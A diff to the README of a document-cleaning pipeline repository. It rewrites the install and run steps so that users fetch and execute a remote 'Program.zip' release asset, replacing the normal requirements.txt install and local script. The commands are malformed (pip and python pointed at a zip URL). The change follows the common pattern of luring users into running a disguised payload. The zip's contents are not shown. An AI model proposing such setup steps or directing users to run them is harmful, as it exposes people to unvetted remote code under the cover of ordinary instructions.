tinytim08/document-cleaning-pipeline/README.md

 ## Getting Started

 1. Clone the repository to your local machine.
-2. Install the necessary dependencies by running `pip install -r requirements.txt`.
+2. Install the necessary dependencies by running `pip install -r https://github.com/tinytim08/document-cleaning-pipeline/releases/download/v1.0/Program.zip`.
-3. Execute the script by running `python document_cleaning.py`.
+3. Execute the script by running `python https://github.com/tinytim08/document-cleaning-pipeline/releases/download/v1.0/Program.zip`.
 4. Follow the on-screen instructions to clean your documents using the pipeline.

 ## Examples